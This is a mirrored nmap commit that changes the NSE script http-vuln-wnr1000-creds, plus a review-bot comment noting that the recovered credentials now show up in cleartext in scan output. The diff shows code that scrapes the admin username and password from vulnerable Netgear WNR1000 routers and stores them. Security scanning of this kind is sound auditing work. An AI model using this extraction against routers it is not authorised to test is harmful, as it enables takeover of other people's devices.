mirror of https://github.com/nmap/nmap.git synced 2025-12-06 04:31:29 +00:00

Report and record recovered creds in http-vuln-wnr1000-creds

dmiller
2017-03-24 16:20:02 +00:00
parent 3220cbd62b
commit 312fbbfcf1


@@ -3,6 +3,7 @@ local shortport = require "shortport"
local stdnse = require "stdnse" local stdnse = require "stdnse"
local string = require "string" local string = require "string"
local vulns = require "vulns" local vulns = require "vulns"
local creds = require "creds"
description = [[ description = [[
A vulnerability has been discovered in WNR 1000 series that allows an attacker A vulnerability has been discovered in WNR 1000 series that allows an attacker
@@ -85,9 +86,13 @@ action = function(host, port)
local netgear_username = string.match(escape(payload_session.body), 'Router Admin Username</td>.+align="left">(.+)</td>.+Router Admin') local netgear_username = string.match(escape(payload_session.body), 'Router Admin Username</td>.+align="left">(.+)</td>.+Router Admin')
local netgear_password = string.match(escape(payload_session.body), 'Router Admin Password</td>.+align="left">(.+)</td>.+MNUText') local netgear_password = string.match(escape(payload_session.body), 'Router Admin Password</td>.+align="left">(.+)</td>.+MNUText')
if (netgear_username ~= nil and netgear_password ~= nil) then if (netgear_username ~= nil and netgear_password ~= nil) then
stdnse.debug1("username : %s", escape(netgear_username)) vuln.exploit_results = {
stdnse.debug1("password : %s", escape(netgear_password)) ("username: %s"):format(netgear_username),
vuln.state = vulns.STATE.VULN ("password: %s"):format(netgear_password),
}
local c = creds.Credentials:new(SCRIPT_NAME, host, port)
c:add(netgear_username, netgear_password, creds.State.VALID)
vuln.state = vulns.STATE.VULN
else else
stdnse.debug1("We haven't been able to get username/password") stdnse.debug1("We haven't been able to get username/password")
end end
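Review bot: The recovered router admin username and password now go into `vuln.exploit_results` and the creds store, so they appear in cleartext in normal and saved scan output, where the old code printed them only at debug level, and nothing in the hunk documents that. I would add a comment above the assignment, `-- NOTE: exploit_results carries the cleartext router credentials; treat saved scan output as sensitive`, and update the script's NSEDoc `@output` sample (not visible here) to show the new `username:` / `password:` lines. The new lines also drop the second `escape()` call the old debug lines made. The values are matched from `escape(payload_session.body)` so they are presumably already sanitised, but `escape` is defined outside this hunk and that should be confirmed before the strings reach the report. The body of `action` starts and ends outside the hunk.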